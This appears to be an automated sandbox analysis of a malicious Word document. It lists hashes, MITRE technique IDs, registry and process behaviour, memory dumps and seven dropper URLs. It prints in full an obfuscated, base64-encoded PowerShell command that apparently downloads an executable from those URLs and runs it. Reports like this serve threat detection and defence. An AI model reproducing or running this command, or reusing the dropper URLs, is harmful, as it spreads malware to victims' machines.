f81e4de8069e9551180db92af779f1c19f7bfef0dde8f9696ae0b242d3fb8f2d

General

Target

BAL_94G1BA0C0.doc
Size

178KB
MD5

d42e77a9116b6511efd39d230a7205a3
SHA1

8543820a8562c6d5592a3cef444b75ba35062fae
SHA256

f81e4de8069e9551180db92af779f1c19f7bfef0dde8f9696ae0b242d3fb8f2d
SHA512

ea3e14cbde76d904b9f83db4139fd687a9276a1ee1515fb3099b62dfa7a980c8fe15618a0896df2cccbc895c5548e2f20e5efcb1ce96211d421991f3f54c2f5a
SSDEEP

3072:w4PrXcuQuvpzm4bkiaMQgAlSB+XoBcRswY9cqP:NDRv1m4bnQgISBwoKRswY9cqP

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://alameenmission.net/cgi-bin/Ju1r8t/

exe.dropper

https://www.altopropiedades.cl/fonts/AWM/

exe.dropper

http://anisoph.com/cgi-bin/u95B/

exe.dropper

http://identisoft.pt/istore/7U/

exe.dropper

http://b3shop.net/calendar/nnxakTd/

exe.dropper

http://nourishmentjuices.com/wp-content/e/

exe.dropper

https://en.entechco.com.vn/wp-includes/9XMEI7/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4156	4736	powersheLL.exe	14

Blocklisted process makes network request 7 IoCs

flow	pid	Process
46	4156	powersheLL.exe
49	4156	powersheLL.exe
51	4156	powersheLL.exe
53	4156	powersheLL.exe
54	4156	powersheLL.exe
59	4156	powersheLL.exe
64	4156	powersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
640	WINWORD.EXE
640	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4156	powersheLL.exe
4156	powersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4156	powersheLL.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
640	WINWORD.EXE
640	WINWORD.EXE
640	WINWORD.EXE
640	WINWORD.EXE
640	WINWORD.EXE
640	WINWORD.EXE
640	WINWORD.EXE
640	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BAL_94G1BA0C0.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:640

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABOAHgANQB1AGsAdAB3AD0AKAAnAEgAJwArACcAcwBzACcAKwAnADIAXwBzADQAJwApADsAJgAoACcAbgBlAHcAJwArACcALQBpAHQAZQBtACcAKQAgACQARQBOAFYAOgBUAEUAbQBwAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAGAAVQBSAEkAdABgAHkAUABSAGAATwBUAG8AQwBPAEwAIgAgAD0AIAAoACcAdAAnACsAJwBsAHMAMQAyACcAKwAnACwAIAB0ACcAKwAnAGwAcwAnACsAJwAxADEALAAgAHQAbABzACcAKQA7ACQAWgBzADMAaQB5AHYAMwAgAD0AIAAoACcAVQBpAHIAeABsACcAKwAnAHQANwAnACsAJwB0ACcAKQA7ACQAUgA1AHIAMQAyAGQAcQA9ACgAJwBFAG8AcAAnACsAJwBuADcAdAB2ACcAKQA7ACQAQwBtADgAdAByAG0AMQA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACcAewAwAH0ATwAnACsAJwBmAGYAaQAnACsAJwBjACcAKwAnAGUAMgAwADEAOQB7ADAAfQAnACkALQBmACAAIABbAGMASABBAFIAXQA5ADIAKQArACQAWgBzADMAaQB5AHYAMwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7ACQAWgBpAF8ANQBfAHcAcwA9ACgAJwBDAHAAcAAnACsAJwBkAGYAeQAnACsAJwBfACcAKQA7ACQAVwBpAGMAdgAwAGkAYgA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBjAGwAaQBlAE4AVAA7ACQAVgBkAGoANQBfAHMAMAA9ACgAJwBoAHQAJwArACcAdAAnACsAJwBwAHMAOgAvAC8AJwArACcAYQBsACcAKwAnAGEAbQAnACsAJwBlAGUAbgBtAGkAcwBzAGkAbwBuAC4AbgAnACsAJwBlAHQALwAnACsAJwBjAGcAJwArACcAaQAtAGIAaQBuAC8ASgAnACsAJwB1ACcAKwAnADEAcgA4ACcAKwAnAHQALwAqAGgAdAB0AHAAJwArACcAcwA6AC8AJwArACcALwAnACsAJwB3ACcAKwAnAHcAJwArACcAdwAuACcAKwAnAGEAJwArACcAbAB0ACcAKwAnAG8AJwArACcAcAByAG8AcABpACcAKwAnAGUAZABhAGQAZQAnACsAJwBzACcAKwAnAC4AJwArACcAYwBsAC8AZgBvAG4AdABzAC8AQQBXACcAKwAnAE0ALwAqAGgAJwArACcAdAB0AHAAJwArACcAOgAvAC8AYQBuACcAKwAnAGkAJwArACcAcwBvAHAAJwArACcAaAAuAGMAJwArACcAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHUAOQA1AEIALwAqAGgAdAAnACsAJwB0AHAAOgAvAC8AaQBkACcAKwAnAGUAbgB0ACcAKwAnAGkAcwBvAGYAdAAuACcAKwAnAHAAdAAnACsAJwAvAGkAcwB0AG8AJwArACcAcgBlACcAKwAnAC8ANwBVAC8AJwArACcAKgBoACcAKwAnAHQAJwArACcAdABwADoALwAvACcAKwAnAGIAMwAnACsAJwBzAGgAbwBwAC4AbgAnACsAJwBlACcAKwAnAHQALwBjACcAKwAnAGEAbABlAG4AZABhAHIALwBuAG4AJwArACcAeABhAGsAVABkACcAKwAnAC8AJwArACcAKgAnACsAJwBoACcAKwAnAHQAdABwADoALwAvAG4AbwB1AHIAaQAnACsAJwBzACcAKwAnAGgAbQAnACsAJwBlAG4AdABqACcAKwAnAHUAaQBjAGUAJwArACcAcwAnACsAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwAC0AYwBvACcAKwAnAG4AdABlACcAKwAnAG4AdAAvAGUALwAqACcAKwAnAGgAdAB0AHAAJwArACcAcwAnACsAJwA6AC8ALwAnACsAJwBlAG4ALgAnACsAJwBlAG4AdABlAGMAaABjAG8ALgBjACcAKwAnAG8AbQAuAHYAbgAvAHcAcAAtACcAKwAnAGkAbgBjAGwAJwArACcAdQAnACsAJwBkAGUAcwAvACcAKwAnADkAWAAnACsAJwBNAEUASQA3AC8AJwApAC4AIgBTAGAAUABMAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEgAZwB4AHoAZgBoAHQAPQAoACcAQgBiADQAZQAnACsAJwBuAGwAOAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABCAHIAZwA4AGIAZwBwACAAaQBuACAAJABWAGQAagA1AF8AcwAwACkAewB0AHIAeQB7ACQAVwBpAGMAdgAwAGkAYgAuACIAZABPAFcATgBgAEwATwBgAEEARABGAGkAbABFACIAKAAkAEIAcgBnADgAYgBnAHAALAAgACQAQwBtADgAdAByAG0AMQApADsAJABYADkAbgBrADgAegBuAD0AKAAnAEkAMwB4AG0AeQAnACsAJwBtAHYAJwApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAEMAbQA4AHQAcgBtADEAKQAuACIAbABgAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADMAMAAwADYANQApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABDAG0AOAB0AHIAbQAxACkAOwAkAFIAYwB6ADgANwB1ADMAPQAoACcAUAA0ADAANABuACcAKwAnAG0ANAAnACkAOwBiAHIAZQBhAGsAOwAkAFQAaABoAGwAegA1AHgAPQAoACcATwBuAG4AdgAnACsAJwBnACcAKwAnADIAMQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAMQB6AGoAaAAzAGEAPQAoACcAUAB2ACcAKwAnAG0AOABwACcAKwAnAGsAMAAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_znigsqxt.ltw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/640-200-0x0000022F80000000-0x0000022F80200000-memory.dmp

Filesize
2.0MB

Download
memory/640-166-0x0000022F80000000-0x0000022F80200000-memory.dmp

Filesize
2.0MB

Download
memory/640-136-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/640-137-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/640-134-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/640-139-0x00007FFA87FB0000-0x00007FFA87FC0000-memory.dmp

Filesize
64KB

Download
memory/640-135-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/640-226-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/640-138-0x00007FFA87FB0000-0x00007FFA87FC0000-memory.dmp

Filesize
64KB

Download
memory/640-225-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/640-224-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/640-133-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/640-223-0x00007FFA8A010000-0x00007FFA8A020000-memory.dmp

Filesize
64KB

Download
memory/4156-199-0x000001AE393A0000-0x000001AE393B0000-memory.dmp

Filesize
64KB

Download
memory/4156-198-0x000001AE393A0000-0x000001AE393B0000-memory.dmp

Filesize
64KB

Download
memory/4156-188-0x000001AE532A0000-0x000001AE532C2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads